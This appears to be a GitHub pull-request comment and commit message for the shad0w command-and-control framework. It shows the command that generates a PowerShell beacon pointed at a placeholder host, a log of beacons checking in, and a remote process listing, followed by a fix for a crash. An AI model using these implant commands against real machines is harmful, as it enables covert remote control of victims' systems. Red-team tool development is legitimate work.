bblenard
commented
4 years ago Tested powershell x64 static payload ps command. The payload was generated via the following command:
./shad0w.py beacon -p x64/windows/static -H TESTIP -f psh -o ~/shad0w/.bridge/www/beacon.ps1 -d
[DEBUG] HTTP - '/register' was hit, attempting to register
[i] Beacon: rto@RTO-WIN10 (ARCH: x64, OS: Windows 10, Type: INSECURE)
shad0w(rto@RTO-WIN10) ≫ beacons
[i] 8 active beacons
+--------+---------------+----------------------------+
| Number | Session | Last Checkin |
+--------+---------------+----------------------------+
| 1 | rto@RTO-WIN10 | 2020-09-14 22:29:48.260678 |
| 2 | rto@RTO-WIN10 | 2020-09-14 22:39:14.543030 |
| 3 | rto@RTO-WIN10 | 2020-09-14 22:44:10.844078 |
| 4 | rto@RTO-WIN10 | 2020-09-14 22:44:11.662407 |
| 5 | rto@RTO-WIN10 | 2020-09-14 22:46:45.526524 |
| 6 | rto@RTO-WIN10 | 2020-09-14 22:50:37.752870 |
| 7 | rto@RTO-WIN10 | 2020-09-14 22:51:56.216035 |
| 8 | rto@RTO-WIN10 | 2020-09-14 23:11:02.245420 |
+--------+---------------+----------------------------+
shad0w(rto@RTO-WIN10) ≫ beacons -i 8
shad0w(rto@RTO-WIN10) ≫ ps
[i] Beacon (8be9e8b21815b9ddff533299043d2544) received task
PID PPID Arch User Name
=== ==== ==== ==== ====
0 0 [System Process]
4 0 System
368 4 smss.exe
452 440 csrss.exe
540 440 wininit.exe
Add stdlib header with function prototypes
The PS command was crashing beacons because of data truncation as a result of an implicit function declaration bug. This change adds a stdlib header that defines all stdlib functions. This file can be included by the beacons to avoid implicit function declarations
Closes #35